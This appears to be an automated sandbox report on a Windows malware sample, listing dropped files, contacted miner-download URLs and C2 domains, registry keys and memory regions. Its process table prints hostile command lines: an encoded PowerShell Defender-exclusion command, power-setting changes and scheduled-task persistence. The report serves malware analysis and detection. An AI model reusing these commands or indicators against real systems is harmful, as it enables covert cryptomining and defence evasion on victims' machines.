Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
setupx 1.exe1.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Dllhost\WinRing0x64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
modified
|
|
|
|
C:\ProgramData\Dllhost\winlogson.exe
|
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
|
modified
|
||
|
C:\ProgramData\HostData\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_setupx 1.exe1.ex_b692906daec281bca74e7bfa93f9f1ed2c1fc_af2557d0_fd0ac405-4335-48d1-8ce2-ed376d339f00\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD0A.tmp.dmp
|
Mini DuMP crash report, 14 streams, Thu Mar 13 12:33:36 2025, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE43.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE83.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwmmczk5.bcz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0bjsjs4.r0o.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uctsftz5.uma.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxg1jhr4.rfo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve.LOG1
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\setupx 1.exe1.exe
|
"C:\Users\user\Desktop\setupx 1.exe1.exe"
|
|
|
|
C:\Users\user\Desktop\setupx 1.exe1.exe
|
"C:\Users\user\Desktop\setupx 1.exe1.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
|
"C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="
& powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg
/x -standby-timeout-dc 0 & powercfg /hibernate off
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -hibernate-timeout-ac 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -hibernate-timeout-dc 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -standby-timeout-ac 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -standby-timeout-dc 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /hibernate off
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://185.215.113.51/WatchDog.exe
|
unknown
|
||
|
https://citydisco.bet/gdJISre
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
bugildbett.top/bAuz
|
|||
|
https://contoso.com/License
|
unknown
|
||
|
https://aka.ms/pscore6lBLr
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sysP
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
|
unknown
|
||
|
https://citydisco.bet/gdJISAAIA
|
unknown
|
||
|
https://citydisco.bet/D
|
unknown
|
||
|
http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
|
unknown
|
||
|
http://185.215.113.51/WatchDog.exeP
|
unknown
|
||
|
citydisco.bet/gdJIS
|
|||
|
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
|
unknown
|
||
|
http://185.215.113.51/conhost.exe:
|
unknown
|
||
|
http://185.215.113.51/WatchDogee
|
unknown
|
||
|
http://185.215.113.51/J
|
unknown
|
||
|
https://citydisco.bet/
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
http://185.215.113.51/D
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sys
|
185.215.113.51
|
||
|
http://185.215.113.51/C
|
unknown
|
||
|
https://support.mozilla.org/products/firefoxgro.all
|
unknown
|
||
|
https://pastebin.com/raw/YpJeSRBC
|
172.67.19.24
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://185.215.113.51/lolMiner.exe
|
unknown
|
||
|
cjlaspcorne.icu/DbIps
|
|||
|
https://citydisco.bet:443/gdJIS
|
unknown
|
||
|
https://citydisco.bet:443/gdJIS71025-5-
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
mrodularmall.top/aNzS
|
|||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://185.215.113.51/
|
unknown
|
||
|
http://185.215.113.51/conhost.exe
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
|
https://ac.ecosia.org?q=
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://pastebin.comd
|
unknown
|
||
|
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
|
jowinjoinery.icu/bdWUa
|
|||
|
legenassedk.top/bdpWO
|
|||
|
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
|
unknown
|
||
|
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
|
unknown
|
||
|
http://185.215.113.51
|
unknown
|
||
|
http://crl.mi
|
unknown
|
||
|
http://185.215.113.51/xmrig.exeP
|
unknown
|
||
|
https://www.ecosia.org/newtab/v20w
|
unknown
|
||
|
http://185.215.113.51/xmrig.exe
|
185.215.113.51
|
||
|
featureccus.shop/bdMAn
|
|||
|
https://citydisco.bet/Vs16c
|
unknown
|
||
|
htardwarehu.icu/Sbdsa
|
|||
|
http://185.215.113.51D
|
unknown
|
||
|
http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe
|
unknown
|
||
|
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
|
unknown
|
||
|
https://duckduckgo.com/chrome_newtabv20
|
unknown
|
||
|
https://citydisco.bet/gdJIS6
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
|
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
|
unknown
|
||
|
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
|
unknown
|
||
|
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
|
unknown
|
||
|
https://citydisco.bet/gdJIS
|
188.114.97.3
|
||
|
http://pastebin.com
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://pastebin.com
|
unknown
|
||
|
https://gemini.google.com/app?q=
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
|
unknown
|
There are 68 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
citydisco.bet
|
188.114.97.3
|
||
|
pastebin.com
|
172.67.19.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
citydisco.bet
|
European Union
|
||
|
172.67.19.24
|
pastebin.com
|
United States
|
||
|
185.215.113.51
|
unknown
|
Portugal
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
ProgramId
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
FileId
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
LongPathHash
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Name
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
OriginalFileName
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Publisher
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Version
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
BinFileVersion
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
BinaryType
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
ProductName
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
ProductVersion
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
LinkDate
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
BinProductVersion
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Size
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Language
|
||
|
\REGISTRY\A\{6fa32212-3c23-545b-ca9e-93c308042f13}\Root\InventoryApplicationFile\setupx 1.exe1.ex|e1b309183e7eab43
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZHKYZWVTC38PGAWGZF49K_RASMANCS
|
FileDirectory
|
There are 24 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
30BE000
|
trusted library allocation
|
page read and write
|
|
|
|
2D39000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
37F7000
|
trusted library allocation
|
page read and write
|
||
|
3827000
|
trusted library allocation
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37F7000
|
trusted library allocation
|
page read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
382D000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
2CBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
30E4000
|
trusted library allocation
|
page read and write
|
||
|
D1F000
|
unkown
|
page write copy
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
FB9000
|
heap
|
page read and write
|
||
|
30B6000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F9E000
|
heap
|
page read and write
|
||
|
EE0000
|
remote allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FC7000
|
heap
|
page read and write
|
||
|
3AD7000
|
trusted library allocation
|
page read and write
|
||
|
317E000
|
trusted library allocation
|
page read and write
|
||
|
1344000
|
heap
|
page read and write
|
||
|
37DE000
|
trusted library allocation
|
page read and write
|
||
|
FE9000
|
heap
|
page read and write
|
||
|
6646000
|
heap
|
page read and write
|
||
|
10F8000
|
stack
|
page read and write
|
||
|
11DB000
|
heap
|
page read and write
|
||
|
842D000
|
trusted library allocation
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
7582000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
3854000
|
trusted library allocation
|
page read and write
|
||
|
C81000
|
unkown
|
page execute read
|
||
|
13F2000
|
trusted library allocation
|
page read and write
|
||
|
37B9000
|
trusted library allocation
|
page read and write
|
||
|
37D9000
|
trusted library allocation
|
page read and write
|
||
|
336A000
|
heap
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
8680000
|
heap
|
page read and write
|
||
|
381C000
|
trusted library allocation
|
page read and write
|
||
|
8507000
|
trusted library allocation
|
page read and write
|
||
|
82D000
|
stack
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
866E000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
37C9000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
7450000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
EE0000
|
remote allocation
|
page read and write
|
||
|
603C000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
FE9000
|
heap
|
page read and write
|
||
|
127A000
|
heap
|
page read and write
|
||
|
F9C000
|
heap
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
5844000
|
trusted library allocation
|
page read and write
|
||
|
D16000
|
unkown
|
page write copy
|
||
|
3802000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
stack
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37D0000
|
trusted library allocation
|
page read and write
|
||
|
699E000
|
stack
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
2CF0000
|
heap
|
page execute and read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
trusted library section
|
page read and write
|
||
|
FB4000
|
heap
|
page read and write
|
||
|
37FE000
|
trusted library allocation
|
page read and write
|
||
|
3088000
|
trusted library allocation
|
page read and write
|
||
|
593E000
|
stack
|
page read and write
|
||
|
5760000
|
trusted library allocation
|
page execute and read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
326B000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
2B88000
|
stack
|
page read and write
|
||
|
2B9A000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
3827000
|
trusted library allocation
|
page read and write
|
||
|
37C5000
|
trusted library allocation
|
page read and write
|
||
|
FEF000
|
heap
|
page read and write
|
||
|
346D000
|
stack
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
F9C000
|
heap
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
5528000
|
trusted library allocation
|
page read and write
|
||
|
FE9000
|
heap
|
page read and write
|
||
|
380A000
|
trusted library allocation
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
37D5000
|
trusted library allocation
|
page read and write
|
||
|
D1A000
|
unkown
|
page readonly
|
||
|
3808000
|
trusted library allocation
|
page read and write
|
||
|
FE4000
|
heap
|
page read and write
|
||
|
3199000
|
trusted library allocation
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
FE4000
|
heap
|
page read and write
|
||
|
FCD000
|
heap
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
3095000
|
trusted library allocation
|
page read and write
|
||
|
37C1000
|
trusted library allocation
|
page read and write
|
||
|
37DA000
|
trusted library allocation
|
page read and write
|
||
|
37BD000
|
trusted library allocation
|
page read and write
|
||
|
662A000
|
heap
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
64FC000
|
stack
|
page read and write
|
||
|
6D5E000
|
stack
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
77BE000
|
stack
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
37D6000
|
trusted library allocation
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
53F5000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
3BCE000
|
stack
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
383A000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
3715000
|
trusted library allocation
|
page read and write
|
||
|
37DF000
|
trusted library allocation
|
page read and write
|
||
|
4FE6000
|
trusted library allocation
|
page read and write
|
||
|
3AD000
|
stack
|
page read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
1130000
|
heap
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
FB9000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
5535000
|
trusted library allocation
|
page read and write
|
||
|
39D1000
|
heap
|
page read and write
|
||
|
3805000
|
trusted library allocation
|
page read and write
|
||
|
37C9000
|
trusted library allocation
|
page read and write
|
||
|
386A000
|
trusted library allocation
|
page read and write
|
||
|
374C000
|
stack
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
54F1000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
trusted library allocation
|
page read and write
|
||
|
3B08000
|
trusted library allocation
|
page read and write
|
||
|
2BCD000
|
heap
|
page read and write
|
||
|
7830000
|
heap
|
page execute and read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
85D0000
|
heap
|
page read and write
|
||
|
37C9000
|
trusted library allocation
|
page read and write
|
||
|
528D000
|
trusted library allocation
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
F42000
|
heap
|
page read and write
|
||
|
3054000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37EA000
|
trusted library allocation
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
2C6D000
|
stack
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
5330000
|
trusted library allocation
|
page read and write
|
||
|
3817000
|
trusted library allocation
|
page read and write
|
||
|
37DF000
|
trusted library allocation
|
page read and write
|
||
|
55A5000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
F3C000
|
heap
|
page read and write
|
||
|
38BA000
|
trusted library allocation
|
page read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
303A000
|
trusted library allocation
|
page read and write
|
||
|
3FF000
|
stack
|
page read and write
|
||
|
54F6000
|
trusted library allocation
|
page read and write
|
||
|
FEB000
|
heap
|
page read and write
|
||
|
2E6F000
|
stack
|
page read and write
|
||
|
FAE000
|
heap
|
page read and write
|
||
|
F66000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
37B4000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
383A000
|
trusted library allocation
|
page read and write
|
||
|
37F9000
|
trusted library allocation
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
37DF000
|
trusted library allocation
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
F76000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
864F000
|
heap
|
page read and write
|
||
|
37EF000
|
trusted library allocation
|
page read and write
|
||
|
6035000
|
trusted library allocation
|
page read and write
|
||
|
3ED000
|
stack
|
page read and write
|
||
|
F3C000
|
heap
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page read and write
|
||
|
3BA8000
|
trusted library allocation
|
page read and write
|
||
|
3852000
|
trusted library allocation
|
page read and write
|
||
|
4D10000
|
heap
|
page execute and read and write
|
||
|
EE0000
|
remote allocation
|
page read and write
|
||
|
355E000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
37CC000
|
trusted library allocation
|
page read and write
|
||
|
76E6000
|
heap
|
